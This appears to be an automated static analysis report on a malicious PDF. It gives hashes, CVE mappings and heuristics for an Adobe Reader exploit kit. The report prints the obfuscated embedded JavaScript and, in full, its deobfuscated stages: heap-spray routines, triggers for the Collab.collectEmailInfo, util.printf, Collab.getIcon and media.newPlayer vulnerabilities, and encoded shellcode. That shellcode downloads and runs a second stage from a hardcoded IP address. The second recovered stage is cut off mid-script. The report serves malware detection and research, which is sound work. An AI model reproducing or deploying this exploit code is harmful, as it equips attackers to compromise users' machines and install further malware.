Malicious PDF — malware analysis report

Static analysis result for SHA-256 ceecf12142df9cb9…

MALICIOUS

PDF

12.6 KB First seen: 2026-05-09
MD5: c5890edceef4d542261021d970af94f3 SHA-1: 571c20c5d331d24d93d3874bf1b577f5f0507b1a SHA-256: ceecf12142df9cb97b45d4064608b1e875f7d795c7f47533f557f57d5a9e24c4
490 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The deobfuscated JavaScript indicates that it attempts to download a second-stage payload from the URL http://66.199.229.50/w.php?f=39&e=5. This exploit kit functionality is characteristic of a downloader or initial access stage.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://66.199.229.50/w.php?f=39&e=5 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0076_000.js pdf-javascript-stream PDF /JS object 76 at offset 0x369 11759 bytes
SHA-256: d1856e0bdc5308ae3214e15673177a268a1502f78b6f6120f4c969070252b73f
Preview script
First 1,000 lines of the extracted script
j='4wbt43t';
z
=
new
Array(64,30,61,43,61,34,6,34,44,44,57,45,59,32,22,34,72,41,55,12,17,17,72,41,30,27,43,47,72,41,55,52,30,27,72,41,15,52,43,47,72,41,43,74,12,47,72,41,12,12,52,30,72,41,17,47,27,65,72,41,47,65,55,57,72,41,55,57,12,65,72,41,65,27,47,65,72,41,15,65,55,57,72,41,52,17,6,27,72,41,15,17,55,57,72,41,12,12,65,55,72,41,17,17,73,57,72,41,52,43,55,57,72,41,65,12,12,27,72,41,12,12,15,47,72,41,55,6,7,27,72,41,6,52,43,43,72,41,30,30,6,65,72,41,57,55,30,30,72,41,47,65,55,57,72,41,27,12,12,65,72,41,12,74,47,17,72,41,15,52,65,17,72,41,55,15,30,57,72,41,7,47,12,47,72,41,43,47,55,52,72,41,52,6,15,52,72,41,43,57,43,74,72,41,52,6,47,27,72,41,55,57,52,17,72,41,12,27,15,52,72,41,15,47,55,57,72,41,15,55,12,52,72,41,30,52,65,12,72,41,55,57,52,17,72,41,7,65,15,17,72,41,30,52,65,12,72,41,27,74,12,12,72,41,47,6,47,74,72,41,29,73,30,27,72,41,27,52,65,12,72,41,73,57,12,12,72,41,57,43,65,30,72,41,12,55,6,65,72,41,15,47,30,7,72,41,27,6,65,55,72,41,65,73,27,57,72,41,73,29,65,12,72,41,43,57,47,65,72,41,12,57,30,6,72,41,15,52,6,30,72,41,52,43,43,17,72,41,52,43,55,57,72,41,65,12,7,47,72,41,17,17,73,73,72,41,65,27,55,57,72,41,55,73,47,57,72,41,43,27,47,17,72,41,52,47,30,30,72,41,65,27,7,47,72,41,73,55,55,57,72,41,73,73,65,12,72,41,65,47,55,57,72,41,65,12,55,57,72,41,29,57,27,52,72,41,52,74,52,43,72,41,43,57,27,12,72,41,29,73,52,12,72,41,17,55,55,57,72,41,55,65,7,65,72,41,65,27,15,73,72,41,15,47,12,12,72,41,74,17,65,12,72,41,30,12,43,57,72,41,17,55,55,57,72,41,55,57,65,55,72,41,17,29,30,15,72,41,52,74,65,52,72,41,74,55,43,55,72,41,30,30,30,30,72,41,43,7,30,30,72,41,43,55,30,74,72,41,65,65,65,65,72,41,65,65,65,65,72,41,52,65,52,55,72,41,47,65,17,29,72,41,30,30,17,55,72,41,65,65,65,65,72,41,52,65,65,65,72,41,27,65,55,12,72,41,52,65,6,74,72,41,55,57,52,52,72,41,55,57,43,27,72,41,6,65,52,43,72,41,27,12,55,12,72,41,30,30,65,52,72,41,17,55,43,12,72,41,17,43,17,30,72,41,65,65,65,65,72,41,15,52,17,55,72,41,17,27,15,7,72,41,52,47,17,73,72,41,6,17,30,30,72,41,27,47,55,12,72,41,55,57,65,55,72,41,43,55,43,55,72,41,30,30,17,6,72,41,30,30,30,30,72,41,65,7,43,57,72,41,15,7,43,57,72,41,43,27,55,6,72,41,65,6,65,47,72,41,65,65,65,65,72,41,52,27,55,73,72,41,65,27,7,47,72,41,65,47,27,15,72,41,15,7,7,47,72,41,17,15,17,52,72,41,27,15,15,12,72,41,7,47,47,47,72,41,15,17,65,47,72,41,12,12,15,7,72,41,27,15,12,7,72,41,7,47,47,47,72,41,7,65,65,55,72,41,15,12,7,73,72,41,52,12,7,65,72,41,30,55,17,55,72,41,65,65,65,65,72,41,30,30,65,65,72,41,65,27,52,17,72,41,43,55,55,57,72,41,27,74,12,12,72,41,27,15,52,6,72,41,6,73,47,47,72,41,15,15,65,65,72,41,17,7,15,65,72,41,27,15,15,47,72,41,6,73,47,47,72,41,7,43,65,52,72,41,17,27,17,47,72,41,27,17,17,27,72,41,6,73,47,47,72,41,65,65,65,74,72,41,55,29,52,74,72,41,65,47,27,6,72,41,55,55,12,65,72,41,6,73,47,47,72,41,47,6,65,47,72,41,17,29,52,6,72,41,17,29,65,65,72,41,52,12,65,65,72,41,17,29,52,15,72,41,30,30,65,65,72,41,6,47,52,17,72,41,27,65,55,52,72,41,6,17,15,52,72,41,65,65,17,29,72,41,30,30,52,12,72,41,65,47,52,17,72,41,65,65,17,29,72,41,43,57,55,12,72,41,52,12,65,27,72,41,52,17,30,30,72,41,55,12,65,47,72,41,65,27,27,12,72,41,65,7,43,57,72,41,6,12,43,57,72,41,55,65,47,15,72,41,65,65,12,30,72,41,30,29,15,52,72,41,55,65,47,15,72,41,65,65,12,30,72,41,27,47,15,52,72,41,65,65,17,29,72,41,30,43,17,29,72,41,52,17,30,30,72,41,43,55,65,55,72,41,30,43,74,27,72,41,30,30,30,30,72,41,47,43,55,43,72,41,43,27,65,43,72,41,30,43,74,55,72,41,65,43,55,29,72,41,17,30,55,74,72,41,57,73,65,6,72,41,27,29,12,12,72,41,52,57,55,29,72,41,27,17,6,57,72,41,15,74,47,17,72,41,6,29,12,17,72,41,15,65,7,30,72,41,15,47,17,55,72,41,15,65,15,47,72,41,7,30,12,29,72,41,12,17,7,30,72,41,7,43,12,17,72,41,12,74,12,6,72,41,7,43,12,74,72,41,12,7,12,7,72,41,7,43,12,74,72,41,12,65,12,52,72,41,15,15,7,30,72,41,15,65,7,43,72,41,15,65,17,55,72,41,17,17,12,30,72,41,12,12,12,73,72,41,7,17,12,74,72,41,12,73,17,52,72,41,65,65,12,52,72,41,65,65,65,65,34,26,30,41,25,27,62,64,38,25,69,43,2,1,9,61,9,29,60,58,67,44,18,23,54,64,49,43,61,9,29,20,49,43,25,32,62,54,63,7,3,58,67,44,18,9,29,21,22,9,29,26,53,9,29,22,9,29,20,59,41,57,59,62,9,64,25,32,61,65,60,58,67,36,7,44,26,9,43,62,41,9,25,69,9,29,26,53,69,30,41,25,27,62,64,38,25,69,57,51,61,44,18,1,29,9,69,73,10,32,22,25,43,23,69,4,9,9,29,67,61,44,26,1,29,9,69,1,23,22,65,51,65,27,65,27,65,27,65,27,26,1,29,9,69,29,73,73,9,22,65,51,47,65,65,65,65,65,26,1,29,9,69,28,29,67,49,38,29,73,22,41,25,43,59,27,29,28,43,61,57,45,59,32,44,26,1,29,9,69,59,27,68,49,43,25,22,28,29,67,49,38,29,73,20,49,43,25,32,62,54,63,7,26,1,29,9,69,58,67,22,29,73,73,9,31,61,59,27,68,49,43,25,21,65,51,12,55,44,26,1,29,9,69,67,29,9,59,28,22,41,25,43,59,27,29,28,43,61,5,72,41,74,65,74,65,72,41,74,65,74,65,5,44,26,67,29,9,59,28,22,43,2,1,9,61,67,29,9,59,28,60,58,67,44,26,1,29,9,69,27,38,41,25,62,7,22,61,1,23,31,65,51,47,65,65,65,65,65,44,36,29,73,73,9,26,30,38,9,61,1,29,9,69,27,38,41,25,62,22,65,26,27,38,41,25,62,3,27,38,41,25,62,7,26,27,38,41,25,62,21,21,44,18,73,10,32,14,27,38,41,25,62,48,22,67,29,9,59,28,21,28,29,67,49,38,29,73,26,53,69,1,29,9,69,38,1,43,9,30,49,38,23,22,41,25,43,59,27,29,28,43,61,5,72,41,65,27,65,27,72,41,65,27,65,27,5,44,26,23,54,64,49,43,61,38,1,43,9,30,49,38,23,20,49,43,25,32,62,54,3,47,47,74,52,7,44,18,38,1,43,9,30,49,38,23,21,22,38,1,43,9,30,49,38,23,26,53,69,62,54,64,59,20,27,38,49,49,29,57,39,62,38,9,43,22,75,38,49,49,29,57,20,27,38,49,49,43,27,62,13,66,29,64,49,0,25,30,38,61,18,59,41,57,45,40,5,5,60,66,59,32,40,38,1,43,9,30,49,38,23,53,44,26,53,69,30,41,25,27,62,64,38,25,69,28,9,64,25,62,30,61,44,18,25,38,28,22,41,25,43,59,27,29,28,43,61,5,72,41,65,4,65,4,72,41,65,4,65,4,72,41,65,4,65,4,72,41,65,4,65,4,5,44,26,1,29,9,69,28,29,67,49,38,29,73,22,41,25,43,59,27,29,28,43,61,57,45,59,32,44,26,54,43,29,28,57,49,38,27,10,22,25,38,28,21,28,29,67,49,38,29,73,26,57,64,32,57,49,38,27,10,22,41,25,43,59,27,29,28,43,61,5,72,41,65,4,65,4,72,41,65,4,65,4,5,44,26,54,43,29,73,43,9,59,64,2,43,22,7,65,26,59,28,9,29,67,22,54,43,29,73,43,9,59,64,2,43,21,54,43,29,28,57,49,38,27,10,20,49,43,25,32,62,54,26,23,54,64,49,43,61,57,64,32,57,49,38,27,10,20,49,43,25,32,62,54,3,59,28,9,29,67,44,18,57,64,32,57,49,38,27,10,21,22,57,64,32,57,49,38,27,10,26,53,69,30,64,49,49,57,49,38,27,10,22,57,64,32,57,49,38,27,10,20,59,41,57,59,62,9,64,25,32,61,65,60,59,28,9,29,67,44,26,57,49,38,27,10,22,57,64,32,57,49,38,27,10,20,59,41,57,59,62,9,64,25,32,61,65,60,57,64,32,57,49,38,27,10,20,49,43,25,32,62,54,31,59,28,9,29,67,44,26,23,54,64,49,43,61,57,49,38,27,10,20,49,43,25,32,62,54,21,59,28,9,29,67,3,65,51,47,65,65,65,65,44,18,57,49,38,27,10,22,57,49,38,27,10,21,57,49,38,27,10,21,30,64,49,49,57,49,38,27,10,26,53,69,66,43,66,22,25,43,23,69,4,9,9,29,67,61,44,26,30,38,9,61,64,22,65,26,64,3,6,47,65,65,26,64,21,21,44,18,66,43,66,14,64,48,22,57,49,38,27,10,21,54,43,29,28,57,49,38,27,10,26,53,69,1,29,9,69,25,41,66,22,6,7,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,26,41,62,64,49,20,28,9,64,25,62,30,61,5,72,47,52,65,65,65,30,5,60,25,41,66,44,26,53,69,30,41,25,27,62,64,38,25,69,32,43,62,64,27,38,25,61,44,18,1,29,9,69,29,9,9,67,22,25,43,23,69,4,9,9,29,67,61,44,26,64,30,61,29,28,28,20,73,38,27,20,75,38,49,49,29,57,20,32,43,62,0,27,38,25,44,18,1,29,9,69,28,29,67,49,38,29,73,22,41,25,43,59,27,29,28,43,61,57,45,59,32,44,26,1,29,9,69,54,24,58,52,65,65,75,50,22,28,29,67,49,38,29,73,20,49,43,25,32,62,54,63,7,26,1,29,9,69,58,67,22,65,51,47,65,65,65,65,65,31,61,54,24,58,52,65,65,75,50,21,65,51,12,55,44,26,1,29,9,69,67,29,9,59,28,22,41,25,43,59,27,29,28,43,61,5,72,41,74,65,74,65,72,41,74,65,74,65,5,44,26,67,29,9,59,28,22,43,2,1,9,61,67,29,9,59,28,60,58,67,44,26,1,29,9,69,28,52,4,45,33,17,52,30,22,61,65,51,65,27,65,27,65,27,65,27,31,65,51,47,65,65,65,65,65,44,36,65,51,47,65,65,65,65,65,26,30,38,9,61,1,29,9,69,1,58,27,42,8,74,17,67,22,65,26,1,58,27,42,8,74,17,67,3,28,52,4,45,33,17,52,30,26,1,58,27,42,8,74,17,67,21,21,44,18,29,9,9,67,14,1,58,27,42,8,74,17,67,48,22,67,29,9,59,28,21,28,29,67,49,38,29,73,26,53,69,1,29,9,69,62,70,56,54,50,57,37,23,22,41,25,43,59,27,29,28,43,61,5,72,65,74,5,44,26,23,54,64,49,43,61,62,70,56,54,50,57,37,23,20,49,43,25,32,62,54,3,65,51,47,65,65,65,44,18,62,70,56,54,50,57,37,23,21,22,62,70,56,54,50,57,37,23,26,53,69,62,70,56,54,50,57,37,23,22,5,50,20,5,21,62,70,56,54,50,57,37,23,26,29,28,28,20,73,38,27,20,75,38,49,49,29,57,20,32,43,62,0,27,38,25,61,62,70,56,54,50,57,37,23,44,26,53,53,69,29,46,49,41,32,64,25,59,22,29,28,28,20,28,49,41,32,0,25,59,26,1,29,9,69,59,1,22,28,29,9,59,43,0,25,62,61,29,28,28,20,1,64,43,23,43,9,71,43,9,59,64,38,25,20,62,38,39,62,9,64,25,32,61,44,20,27,54,29,9,4,62,61,65,44,44,26,30,38,9,61,1,29,9,69,64,22,65,26,64,3,29,46,49,41,32,64,25,59,20,49,43,25,32,62,54,26,64,21,21,44,18,64,30,61,29,46,49,41,32,64,25,59,14,64,48,20,25,29,66,43,22,22,34,13,39,27,9,64,28,62,34,44,18,1,29,9,69,49,1,22,29,46,49,41,32,64,25,59,14,64,48,20,1,43,9,59,64,38,25,26,53,53,69,64,30,61,61,49,1,22,22,74,44,16,16,61,61,59,1,22,22,55,44,35,35,61,49,1,3,22,55,20,6,7,44,44,44,18,32,43,62,64,27,38,25,61,44,26,53,43,49,59,43,69,64,30,61,49,1,22,22,15,20,6,44,18,28,9,64,25,62,30,61,44,26,53,43,49,59,43,69,64,30,61,61,61,59,1,22,22,17,44,16,16,61,59,1,22,22,15,44,44,35,35,61,49,1,3,15,20,6,6,44,44,18,57,51,61,44,26,53,43,49,59,43,69,64,30,61,61,49,1,19,22,74,20,6,44,16,16,61,49,1,3,22,74,20,7,44,16,16,61,49,1,19,22,55,20,6,12,44,16,16,61,49,1,3,22,55,20,6,15,44,44,18,30,41,25,27,62,64,38,25,69,29,61,44,18,41,62,64,49,20,28,9,64,25,62,73,61,34,28,11,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,69,40,69,67,67,67,67,6,6,6,34,60,25,43,23,69,8,29,62,43,61,44,44,26,53,1,29,9,69,54,22,29,28,28,20,28,49,41,32,0,25,59,26,30,38,9,61,1,29,9,69,30,22,65,26,30,3,54,20,49,43,25,32,62,54,26,30,21,21,44,18,64,30,61,54,14,30,48,20,25,29,66,43,22,22,34,13,39,27,9,64,28,62,34,44,18,1,29,9,69,64,22,54,14,30,48,20,1,43,9,59,64,38,25,26,53,53,69,64,30,61,61,64,19,55,20,6,7,44,35,35,61,64,3,55,20,7,44,44,18,27,22,25,43,23,69,4,9,9,29,67,61,44,26,1,29,9,69,73,22,41,25,43,59,27,29,28,43,61,34,72,41,74,65,74,65,72,41,74,65,74,65,34,44,26,1,29,9,69,43,22,41,25,43,59,27,29,28,43,61,57,45,59,32,44,26,23,54,64,49,43,61,73,20,49,43,25,32,62,54,3,22,65,51,55,65,65,65,44,18,73,21,22,73,26,53,73,22,73,20,59,41,57,59,62,9,61,65,60,65,51,55,65,65,65,31,43,20,49,43,25,32,62,54,44,26,30,38,9,61,30,22,65,26,30,3,7,74,65,65,26,30,21,21,44,18,27,14,30,48,22,73,21,43,26,53,29,61,44,26,29,61,44,26,62,9,67,18,62,54,64,59,20,66,43,73,64,29,20,25,43,23,46,49,29,67,43,9,61,25,41,49,49,44,26,53,27,29,62,27,54,61,43,44,18,53,29,61,44,26,53,53);
a=new String("Ivz<A'12Drk@3E[7|6{>.+=wWn;cpaf-gK'&/GoS:uQe)jP4]lNx5}h8Mbqs,(t*i0my_ UV%d9C");
b="al";
b2="v"
+b;
try
{
for(i in app)
if(i=='printerNames')
fqwf-1;
}catch(q){
e=j['substr']();
try{
b='e'+b2;
if(!google.search())
a=2;
}
catch(q){
e=
e[
b];
}
s=new String();try{if(!google.search())throw 1;}catch(q){r=1;}{
for(j=0;j<z.length;j++)
try{
if(!google.search())throw 1;}catch(q){
s
+=
a[
z[j]];
}
}}

try{if(!google.search())bbb-123;}
catch(nergerg){
e(s);
}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x369 3858 bytes
SHA-256: e2ca0edd0408060452bde7de995df6571bedb1cd01804c4ffddfbb2430acd291
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
if(e('1'))bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u362f%u2e36%u3931%u2e39%u3232%u2e39%u3035%u772f%u702e%u7068%u663f%u333d%u2639%u3d65%u0035%u0000';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape('%u0c0c%u0c0c');while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:'',msg:overflow});} function printf(){nop=unescape('%u0A0A%u0A0A%u0A0A%u0A0A');var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape('%u0A0A%u0A0A');headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf('%45000f',num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape('%09');while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw='N.'+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 76 at offset 0x369 3854 bytes
SHA-256: e21e5029305be298c90417eb5941f175eecaffe1fc56e113916a4d3e903194ae
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
if(e('1'))bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u362f%u2e36%u3931%u2e39%u3232%u2e39%u3035%u772f%u702e%u7068%u663f%u333d%u2639%u3d65%u0035%u0000';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape('%u0c0c%u0c0c');while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:'',msg:overflow});} function printf(){nop=unescape('%u0A0A%u0A0A%u0A0A%u0A0A');var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape('%u0A0A%u0A0A');headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf('E000f',num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape('	');while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} 